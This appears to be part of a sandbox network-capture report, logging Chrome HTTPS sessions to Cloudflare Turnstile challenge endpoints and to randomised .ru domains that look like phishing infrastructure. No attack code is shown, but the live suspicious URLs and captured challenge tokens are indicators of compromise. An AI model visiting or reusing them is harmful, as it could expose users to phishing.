                                                                                                                              2024-12-04 20:16:15 UTC1369INData Raw: 76 48 6d 36 37 32 31 2b 64 2f 68 37 2b 37 5a 76 76 43 35 31 39 6e 45 39 64 33 47 2b 4d 38 4f 34 63 7a 39 35 63 34 42 31 2f 55 4b 31 4f 72 7a 2b 76 34 5a 36 64 76 61 41 2f 6b 6c 45 69 49 48 4b 42 62 72 43 69 38 59 4a 66 6e 71 4d 68 33 39 37 2b 34 58 44 6a 6b 6c 47 78 34 2f 51 50 67 54 51 53 34 45 49 6b 63 42 46 77 4d 70 53 6a 63 75 44 67 6b 6b 4d 44 42 41 50 30 41 50 51 52 67 32 53 68 4a 52 4e 44 67 2f 57 7a 5a 6a 47 68 30 34 52 6c 45 6f 57 46 70 6c 53 31 70 50 57 54 42 4b 4b 31 30 30 61 47 59 76 62 56 42 59 57 33 64 6f 66 7a 63 35 56 47 78 74 52 49 52 32 67 57 64 32 5a 6e 56 4c 54 55 65 46 6a 46 78 69 66 46 4e 6d 68 70 46 33 68 6f 53 46 54 6d 68 75 69 46 39 79 57 34 31 57 63 48 61 51 6f 6e 71 61 70 59 75 61 6a 5a 6c 69 66 49 4b 63 72 6f 5a 76 6f 57 71 45
                                                                                                                              Data Ascii: vHm6721+d/h7+7ZvvC519nE9d3G+M8O4cz95c4B1/UK1Orz+v4Z6dvaA/klEiIHKBbrCi8YJfnqMh397+4XDjklGx4/QPgTQS4EIkcBFwMpSjcuDgkkMDBAP0APQRg2ShJRNDg/WzZjGh04RlEoWFplS1pPWTBKK100aGYvbVBYW3dofzc5VGxtRIR2gWd2ZnVLTUeFjFxifFNmhpF3hoSFTmhuiF9yW41WcHaQonqapYuajZlifIKcroZvoWqE


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              26192.168.2.449784104.18.94.414433336C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-04 20:16:16 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1622837158:1733341834:Dc9KQflSkPZkmMEtyak2vrZSKicoXy7NaQkbVZnHHyQ/8ece78d77fea8c95/vYfNl33Oh6QHrtE.EMiOKVI5WsVZz.L4qQJn_Uj7HoA-1733343363-1.1.1.1-Vr3hLzRGqU62Jd1H5QGtItUYdGf_SlbwjkhOjzwmkcw7gVZlmEAg7_s.Fi.hyiaX HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-12-04 20:16:17 UTC379INHTTP/1.1 404 Not Found
                                                                                                                              Date: Wed, 04 Dec 2024 20:16:17 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 7
                                                                                                                              Connection: close
                                                                                                                              cf-chl-out: wtxtPXnXaRG9LQ/ms6iRVQ3Leh12TrWXvyE=$nvd3E4fJFn8djVXG
                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8ece792a88e642ac-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              2024-12-04 20:16:17 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                              Data Ascii: invalid


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              27192.168.2.449785104.18.94.414433336C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-04 20:16:21 UTC1175OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1622837158:1733341834:Dc9KQflSkPZkmMEtyak2vrZSKicoXy7NaQkbVZnHHyQ/8ece78d77fea8c95/vYfNl33Oh6QHrtE.EMiOKVI5WsVZz.L4qQJn_Uj7HoA-1733343363-1.1.1.1-Vr3hLzRGqU62Jd1H5QGtItUYdGf_SlbwjkhOjzwmkcw7gVZlmEAg7_s.Fi.hyiaX HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Content-Length: 34136
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              Content-type: application/x-www-form-urlencoded
                                                                                                                              CF-Chl-RetryAttempt: 0
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              CF-Challenge: vYfNl33Oh6QHrtE.EMiOKVI5WsVZz.L4qQJn_Uj7HoA-1733343363-1.1.1.1-Vr3hLzRGqU62Jd1H5QGtItUYdGf_SlbwjkhOjzwmkcw7gVZlmEAg7_s.Fi.hyiaX
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Origin: https://challenges.cloudflare.com
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/15pl4/0x4AAAAAAA0qpC5c45_RMlWM/auto/fbE/normal/auto/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-12-04 20:16:21 UTC16384OUTData Raw: 76 5f 38 65 63 65 37 38 64 37 37 66 65 61 38 63 39 35 3d 25 32 62 35 45 68 41 2d 36 51 47 6a 74 59 35 59 75 2d 31 59 33 59 70 44 37 59 71 59 71 68 73 42 68 76 4b 79 36 53 59 74 49 71 71 45 70 4b 59 6c 6a 59 30 24 44 35 72 59 73 37 59 2b 24 37 4c 76 77 76 59 32 49 44 77 72 36 4e 2b 6d 59 72 59 6e 76 59 37 79 59 41 47 67 68 61 71 59 45 72 36 77 59 76 72 2d 6b 73 68 38 71 72 59 49 33 24 59 67 7a 6a 61 47 43 5a 44 64 66 59 43 67 7a 69 59 71 75 36 42 59 76 71 42 72 71 46 59 76 79 72 75 6c 59 36 5a 59 38 74 59 6a 68 59 32 35 68 2d 32 59 72 44 45 59 37 7a 4b 75 72 59 31 35 52 37 71 4c 51 6d 42 72 32 37 61 35 6d 45 35 51 42 73 63 75 68 59 73 35 4e 59 59 61 75 44 45 69 63 72 59 66 4e 4b 6d 63 6a 4e 62 55 74 78 44 67 4d 52 52 63 43 6a 65 41 51 65 53 36 4b 6d 36 66
                                                                                                                              Data Ascii: v_8ece78d77fea8c95=%2b5EhA-6QGjtY5Yu-1Y3YpD7YqYqhsBhvKy6SYtIqqEpKYljY0$D5rYs7Y+$7LvwvY2IDwr6N+mYrYnvY7yYAGghaqYEr6wYvr-ksh8qrYI3$YgzjaGCZDdfYCgziYqu6BYvqBrqFYvyrulY6ZY8tYjhY25h-2YrDEY7zKurY15R7qLQmBr27a5mE5QBscuhYs5NYYauDEicrYfNKmcjNbUtxDgMRRcCjeAQeS6Km6f
                                                                                                                              2024-12-04 20:16:21 UTC16384OUTData Raw: 63 65 5a 59 67 59 43 68 4d 35 4b 59 70 63 36 4f 36 34 46 6e 59 43 77 6b 42 37 68 36 33 55 6a 64 6d 59 59 4c 72 62 59 45 68 2d 47 59 70 35 2b 74 6a 6e 59 69 59 33 24 2d 71 68 55 59 44 47 2d 4b 59 78 39 6a 72 36 36 59 64 59 2d 24 43 62 59 34 59 6a 24 59 2d 59 72 68 43 47 61 63 59 62 68 59 47 2d 74 59 46 68 69 47 59 4f 59 2b 68 44 38 36 47 59 66 68 69 74 43 32 59 4b 59 33 74 59 68 59 45 72 59 68 2d 66 35 67 59 38 6d 43 38 6b 51 45 37 37 36 35 59 78 59 33 24 36 74 59 37 56 33 35 36 73 59 38 48 46 35 59 63 24 32 68 69 57 57 6b 2d 65 59 44 47 59 4b 24 73 59 36 49 59 78 72 43 59 44 68 59 4b 24 30 72 37 51 36 47 59 36 24 44 47 59 47 59 36 24 2d 47 43 4b 59 39 68 44 47 36 79 68 5a 24 6a 74 59 70 59 77 59 67 74 43 6e 59 38 32 6a 62 36 73 59 72 72 70 45 2d 7a 59 31
                                                                                                                              Data Ascii: ceZYgYChM5KYpc6O64FnYCwkB7h63UjdmYYLrbYEh-GYp5+tjnYiY3$-qhUYDG-KYx9jr66YdY-$CbY4Yj$Y-YrhCGacYbhYG-tYFhiGYOY+hD86GYfhitC2YKY3tYhYErYh-f5gY8mC8kQE7765YxY3$6tY7V356sY8HF5Yc$2hiWWk-eYDGYK$sY6IYxrCYDhYK$0r7Q6GY6$DGYGY6$-GCKY9hDG6yhZ$jtYpYwYgtCnY82jb6sYrrpE-zY1
                                                                                                                              2024-12-04 20:16:21 UTC1368OUTData Raw: 78 69 70 53 5a 33 47 48 24 59 63 4e 51 72 59 54 56 63 66 51 68 33 4d 32 39 45 5a 58 69 41 69 2b 59 55 2b 62 35 37 73 59 48 68 73 52 72 4b 24 4c 6d 36 78 44 35 59 70 59 43 74 37 6f 6c 56 38 35 72 2d 48 6a 70 59 2b 46 24 56 59 34 66 2b 7a 49 39 69 73 72 74 32 31 32 66 5a 77 32 42 43 53 24 65 54 49 74 76 78 6e 69 4d 4b 52 59 53 74 74 72 37 4b 44 36 59 4d 68 36 74 2d 4d 59 51 72 69 53 36 68 4f 48 68 66 72 31 65 36 53 67 59 63 6e 37 57 51 68 76 59 39 63 68 54 36 55 49 6d 6d 61 78 51 43 79 67 51 59 63 36 48 43 37 54 53 56 46 54 72 36 65 59 63 4b 4e 67 4d 68 39 66 46 36 35 58 5a 59 35 62 75 37 2d 4d 59 78 62 36 4b 59 24 78 52 50 70 67 30 35 59 51 59 70 35 70 57 36 49 24 6c 57 4e 49 52 4f 74 69 55 49 50 49 52 72 63 4b 59 74 24 5a 42 2d 38 52 38 6a 4d 63 73 6f 68
                                                                                                                              Data Ascii: xipSZ3GH$YcNQrYTVcfQh3M29EZXiAi+YU+b57sYHhsRrK$Lm6xD5YpYCt7olV85r-HjpY+F$VY4f+zI9isrt212fZw2BCS$eTItvxniMKRYSttr7KD6YMh6t-MYQriS6hOHhfr1e6SgYcn7WQhvY9chT6UImmaxQCygQYc6HC7TSVFTr6eYcKNgMh9fF65XZY5bu7-MYxb6KY$xRPpg05YQYp5pW6I$lWNIROtiUIPIRrcKYt$ZB-8R8jMcsoh
                                                                                                                              2024-12-04 20:16:22 UTC1312INHTTP/1.1 200 OK
                                                                                                                              Date: Wed, 04 Dec 2024 20:16:22 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Content-Length: 4472
                                                                                                                              Connection: close
                                                                                                                              cf-chl-out-s: CC/c7iy8q3d1k/5KUJmjGOuVQiA4ghVb2tqFNrUefI5S0s1jfj6mZsvkerBioImMPdAHxcwSxDG8gStYYn7mmUbpLz/cqJdjAODa2d5RKvhP9Q6u2MF3kKn5Y3pTKNt37m7BSdCA7RjSs4aTNjr/Pk3kIZfyBS/5VivThKHecGTcGZrCF1gTFHB+J9c7Rsgx/qDsPq05nnb160HOIGQitpXqnKD+xOt9wnUHEx8+aZbwZMo9nJtCdbQkxUS/aor0HOCteNBR0dtqXO2jsVdAuC6cYbD2Y/KFkd1pweprxR37baEP1R+Dg9SeNgjKZdTvv0AcNQoZi8ilLTF1QHPrkqIaftcshNndD6wDYWSNt3fbH4YpbvI0uEsw5b8rfPKaX64JumaCQGhYdTy1hsvzJWm6BaHlZDNn/2TcwMgumsqklh/zKFuUeTZdEwXrd1BDjr/4Rz4CBH/wo1TLVGVHqnMb4UnXa34d4svo2ny9WGUELG3HkD3JtEByWJAloSQnuCSS8SuauCsUkbcsxAtVsETbvMBR1ruqyWrUeqlLQ0PLGnjLYASl8NDLjlUpzgk1klLvmz7x6Hdi6XmwyC73149xBXpkp8IKQTJ5+xIjcWTiZXlkCAqauswPxInOR7unvc7T2EDUVWpyYw3qiw/U7OeMD1sWc6pFjJdwSwhko+vtsQQDrXt8ziMxuqFkedHrL8w2FD1+7VoBUXi7XgDmzU6GSZWwya5TwJNORfDLlljrVCq9PQZcZUy/aI74/HS4q0WOWf7biVCtCMdy0bfqYuNdKMQ7r0VjK8/1r98Q8hXDasDW4rSf66kqpjVbz2gecdZUCngNmQ1kYhJ6N4zzwloQXE4EPGT/NOR6jNgFl/UV9x4UPPxvCoYUtbuCdheNP0oQb1ygJOCmNxV6m8COLZYWvYiRI/JpGMQJrTqBccZqu1jEzdD7Y5uoa+b49bzGY/RYAKQcKw87oY2qhsDcX0H3zN90bQf8S0YM2rWHZrXQcWGX9C [TRUNCATED]
                                                                                                                              2024-12-04 20:16:22 UTC233INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 65 68 32 56 6d 4f 33 5a 59 49 61 48 42 75 41 34 35 51 77 52 5a 55 45 6c 74 79 35 55 75 52 47 4e 47 41 39 63 45 62 49 58 4e 34 33 65 65 31 33 50 66 61 64 47 72 48 7a 77 54 64 36 31 50 2f 61 38 36 50 33 46 5a 30 79 64 66 63 71 69 36 62 4a 43 59 57 42 32 37 71 70 2b 52 56 71 4b 6c 58 76 77 75 55 6a 73 58 64 67 2f 77 68 66 33 50 52 2b 52 49 53 77 4a 36 74 6f 3d 24 4d 39 41 77 61 32 47 46 43 6a 7a 79 78 37 35 6b 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 65 63 65 37 39 34 37 61 39 66 61 66 37 39 33 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: cf-chl-out: eh2VmO3ZYIaHBuA45QwRZUElty5UuRGNGA9cEbIXN43ee13PfadGrHzwTd61P/a86P3FZ0ydfcqi6bJCYWB27qp+RVqKlXvwuUjsXdg/whf3PR+RISwJ6to=$M9Awa2GFCjzyx75kServer: cloudflareCF-RAY: 8ece7947a9faf793-EWRalt-svc: h3=":443"; ma=86400
                                                                                                                              2024-12-04 20:16:22 UTC1193INData Raw: 65 37 65 33 70 6f 4f 7a 70 4b 44 4d 74 71 53 69 68 35 32 76 7a 72 32 31 30 38 2b 73 6f 37 4b 70 73 70 4b 72 32 4d 32 66 79 65 4f 74 76 64 4f 31 74 4c 48 6a 74 39 6d 6f 78 4d 33 6f 70 75 76 42 75 2f 48 76 78 63 50 41 2b 72 6a 46 2b 2b 76 61 38 66 43 33 2f 4d 2f 43 7a 77 63 46 78 39 4f 38 42 63 7a 66 78 4f 50 72 2f 73 72 63 30 76 30 57 45 51 45 47 47 66 48 76 38 74 73 53 37 4f 30 67 2b 2b 34 46 34 79 55 6f 2f 68 54 2b 4a 43 72 39 4a 68 49 71 42 69 59 4f 38 75 38 6d 43 53 30 44 44 69 34 35 4b 42 45 78 45 6a 73 56 45 44 77 46 52 53 70 4c 4c 45 59 6d 4c 69 51 65 4b 69 56 4d 48 46 52 49 4f 43 46 58 4e 69 5a 49 52 6c 6c 51 54 6c 30 30 4c 30 4d 64 58 54 68 6b 50 53 5a 6a 54 53 56 47 61 6d 77 6a 51 47 56 51 59 32 39 77 52 6c 5a 6b 5a 6a 6f 37 56 55 30 35 65 6a 39
                                                                                                                              Data Ascii: e7e3poOzpKDMtqSih52vzr2108+so7KpspKr2M2fyeOtvdO1tLHjt9moxM3opuvBu/HvxcPA+rjF++va8fC3/M/CzwcFx9O8BczfxOPr/src0v0WEQEGGfHv8tsS7O0g++4F4yUo/hT+JCr9JhIqBiYO8u8mCS0DDi45KBExEjsVEDwFRSpLLEYmLiQeKiVMHFRIOCFXNiZIRllQTl00L0MdXThkPSZjTSVGamwjQGVQY29wRlZkZjo7VU05ej9
                                                                                                                              2024-12-04 20:16:22 UTC1369INData Raw: 78 34 33 41 69 49 47 50 7a 59 67 49 55 51 75 44 51 6b 39 45 43 49 54 50 30 77 57 4d 6b 4d 58 4c 68 35 41 50 78 31 66 56 45 4a 43 58 31 51 38 59 54 4a 62 4a 30 74 4d 59 6b 38 37 4f 6c 30 77 51 6a 46 74 56 6e 46 44 62 55 30 35 66 32 6b 38 56 31 6c 76 56 49 46 77 66 45 4e 61 50 48 5a 46 66 49 61 44 68 59 46 39 53 6e 52 69 55 33 39 55 68 59 6d 50 6b 46 70 35 69 48 56 71 6b 34 32 62 58 56 32 61 69 58 35 70 6d 59 31 6d 67 4a 6d 6d 67 72 43 67 67 36 6d 53 6e 33 53 4f 74 61 36 4c 6b 36 7a 41 6e 6e 71 56 75 4c 6d 39 6b 36 65 2f 6e 72 32 38 68 61 71 2f 74 34 7a 42 76 72 50 4c 6a 70 37 59 71 59 2b 78 32 5a 61 33 70 38 6a 61 32 62 54 6a 6e 63 53 77 35 39 2b 33 31 39 54 6a 34 4b 6d 6d 76 76 4c 49 34 2b 6a 73 73 4f 71 78 36 64 72 6d 79 74 71 36 36 73 2f 54 33 50 4c 73
                                                                                                                              Data Ascii: x43AiIGPzYgIUQuDQk9ECITP0wWMkMXLh5APx1fVEJCX1Q8YTJbJ0tMYk87Ol0wQjFtVnFDbU05f2k8V1lvVIFwfENaPHZFfIaDhYF9SnRiU39UhYmPkFp5iHVqk42bXV2aiX5pmY1mgJmmgrCgg6mSn3SOta6Lk6zAnnqVuLm9k6e/nr28haq/t4zBvrPLjp7YqY+x2Za3p8ja2bTjncSw59+319Tj4KmmvvLI4+jssOqx6drmytq66s/T3PLs
                                                                                                                              2024-12-04 20:16:22 UTC1369INData Raw: 67 62 4e 30 45 43 49 51 30 4a 48 51 64 51 54 68 56 4a 44 46 51 61 4b 31 4e 58 57 52 70 65 52 46 78 6c 56 31 39 67 56 56 39 6b 5a 47 46 73 61 47 31 6f 61 43 55 39 55 48 4a 52 51 6b 46 44 4e 32 78 61 4f 30 68 58 66 44 68 38 52 46 67 38 4f 56 39 68 65 55 70 6a 66 32 46 42 66 5a 4a 51 53 59 43 54 64 30 31 6f 57 5a 56 76 6c 6e 71 5a 6b 70 36 69 6b 31 6c 31 6e 6f 53 65 63 49 47 46 64 48 53 6e 69 36 46 71 6d 61 64 75 69 36 4a 30 62 61 53 71 65 58 75 6f 6d 48 61 33 6e 4a 69 68 75 37 32 4f 65 4d 47 32 75 70 6d 67 70 6f 79 6d 70 4b 65 6f 79 5a 37 43 30 37 2b 54 78 73 4f 76 6d 63 6a 62 76 71 75 6f 75 62 36 66 35 62 7a 68 76 4d 44 45 36 5a 32 30 78 63 6d 71 37 4d 58 51 73 2f 4c 72 78 4d 75 71 35 72 62 47 31 4e 57 36 7a 75 2f 67 41 73 2f 64 31 65 62 54 75 67 6a 72 78
                                                                                                                              Data Ascii: gbN0ECIQ0JHQdQThVJDFQaK1NXWRpeRFxlV19gVV9kZGFsaG1oaCU9UHJRQkFDN2xaO0hXfDh8RFg8OV9heUpjf2FBfZJQSYCTd01oWZVvlnqZkp6ik1l1noSecIGFdHSni6Fqmadui6J0baSqeXuomHa3nJihu72OeMG2upmgpoympKeoyZ7C07+TxsOvmcjbvquoub6f5bzhvMDE6Z20xcmq7MXQs/LrxMuq5rbG1NW6zu/gAs/d1ebTugjrx
                                                                                                                              2024-12-04 20:16:22 UTC541INData Raw: 50 56 55 4d 4f 4a 45 56 58 47 69 4d 4f 46 45 67 71 58 6a 78 5a 49 32 42 46 51 44 35 41 5a 79 46 42 4e 55 6c 4e 4f 30 68 49 59 79 56 4c 5a 30 39 4e 5a 55 56 37 4f 56 56 56 4f 6b 6c 4a 59 56 6c 42 67 34 61 42 55 7a 70 70 63 31 39 69 58 55 31 6c 57 33 75 53 59 57 75 57 56 6c 4e 75 6b 33 70 6f 6d 49 74 7a 62 6e 69 54 65 32 39 61 67 5a 46 38 70 35 71 6b 5a 71 6d 71 71 48 75 76 70 6e 47 43 6a 61 4f 7a 67 62 53 36 63 6f 61 71 64 49 69 56 6d 61 75 57 6b 59 2b 59 67 4a 36 52 75 35 53 4b 79 4d 4f 4e 6a 73 33 43 7a 35 50 45 69 38 75 75 73 38 62 4c 73 4d 6a 48 6d 5a 75 53 79 2b 4b 34 30 4e 50 6d 76 4c 50 71 33 4b 65 33 31 36 62 47 75 36 69 72 79 50 58 52 72 38 37 54 36 37 4b 34 36 4f 72 76 31 74 62 59 39 39 6e 66 34 50 33 63 43 74 6e 45 78 67 6e 33 7a 73 73 53 42 77
                                                                                                                              Data Ascii: PVUMOJEVXGiMOFEgqXjxZI2BFQD5AZyFBNUlNO0hIYyVLZ09NZUV7OVVVOklJYVlBg4aBUzppc19iXU1lW3uSYWuWVlNuk3pomItzbniTe29agZF8p5qkZqmqqHuvpnGCjaOzgbS6coaqdIiVmauWkY+YgJ6Ru5SKyMONjs3Cz5PEi8uus8bLsMjHmZuSy+K40NPmvLPq3Ke316bGu6iryPXRr87T67K46Orv1tbY99nf4P3cCtnExgn3zssSBw


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              28192.168.2.449786104.18.94.414433336C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-04 20:16:23 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1622837158:1733341834:Dc9KQflSkPZkmMEtyak2vrZSKicoXy7NaQkbVZnHHyQ/8ece78d77fea8c95/vYfNl33Oh6QHrtE.EMiOKVI5WsVZz.L4qQJn_Uj7HoA-1733343363-1.1.1.1-Vr3hLzRGqU62Jd1H5QGtItUYdGf_SlbwjkhOjzwmkcw7gVZlmEAg7_s.Fi.hyiaX HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-12-04 20:16:23 UTC379INHTTP/1.1 404 Not Found
                                                                                                                              Date: Wed, 04 Dec 2024 20:16:23 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 7
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                              cf-chl-out: jWc3ZXCEuYmbUNEaXhKPdtUcWu6XwpbOvdU=$Fbn7G09IJMp7y8AP
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8ece79549811424d-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              2024-12-04 20:16:23 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                              Data Ascii: invalid


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              29192.168.2.449788172.67.189.384433336C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-04 20:16:25 UTC678OUTGET /kNNCRuAPpzARwNvUMVngxkKlnBtlOVFKCVBSKRNJNYUETDCIVHZAXTHNFZJHUGPMWRUVXGCTFFWUZPWWUFQX HTTP/1.1
                                                                                                                              Host: eukiskknipcxxzuhmrgophxam0nybqm6y9rnsitcacvfzwlsbvd.bfcgpixdwnw.ru
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Origin: https://h6n.xswpbsmx.ru
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Referer: https://h6n.xswpbsmx.ru/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-12-04 20:16:28 UTC893INHTTP/1.1 200 OK
                                                                                                                              Date: Wed, 04 Dec 2024 20:16:28 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nmj40JrY%2FoipdtgbNQQ1e0Q5Tk0XoG0eHgmv54XYRhBiFyI9O1OXQ%2FGYYsPnjV%2BVdLlazN9UUuALMMVTc591vvI0ne4F5JfwKUo1cq5fOxVhXr4laOjYd8fiZkQRSSBlNQfDy0P9%2BooVoxeIaZ1kYkh24JkWW0uzqzVGqEUiVBD4XaSJcvbapXdsoQ%2F9GuQCJ1wlYwk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8ece795eff8a43be-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1719&min_rtt=1718&rtt_var=647&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1256&delivery_rate=1687861&cwnd=220&unsent_bytes=0&cid=c98fa4101cba2d7a&ts=3615&x=0"
                                                                                                                              2024-12-04 20:16:28 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                              Data Ascii: 11
                                                                                                                              2024-12-04 20:16:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              30192.168.2.449792104.21.65.724433336C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-04 20:16:31 UTC474OUTGET /kNNCRuAPpzARwNvUMVngxkKlnBtlOVFKCVBSKRNJNYUETDCIVHZAXTHNFZJHUGPMWRUVXGCTFFWUZPWWUFQX HTTP/1.1
                                                                                                                              Host: eukiskknipcxxzuhmrgophxam0nybqm6y9rnsitcacvfzwlsbvd.bfcgpixdwnw.ru
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-12-04 20:16:32 UTC903INHTTP/1.1 200 OK
                                                                                                                              Date: Wed, 04 Dec 2024 20:16:32 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CiJj77mHt5AuKx1xTBGQ7SiAMv%2BMGO%2FYA%2BoRv0Cki93eWlgPoaHyIiMMvKXoQEsuhZmph%2FiqvGJtJteyWrg%2FJL4E4sGuRG53p%2BM2v56D5OTt7ERGMS%2BOfdSVSb3Soo19K%2BQ5hCN45CBKpyoJNIGPDE5iHNXc3BEDzdwsKrsIhHtfjsxKnzOPxmNQHfhtJ3By1%2B2nGZE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8ece7986fe62efa7-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=38818&min_rtt=2804&rtt_var=22580&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1052&delivery_rate=1041369&cwnd=137&unsent_bytes=0&cid=734cb699ecad32ce&ts=883&x=0"
                                                                                                                              2024-12-04 20:16:32 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                              Data Ascii: 11
                                                                                                                              2024-12-04 20:16:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              31192.168.2.44979313.107.139.114433336C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-04 20:16:33 UTC701OUTGET / HTTP/1.1
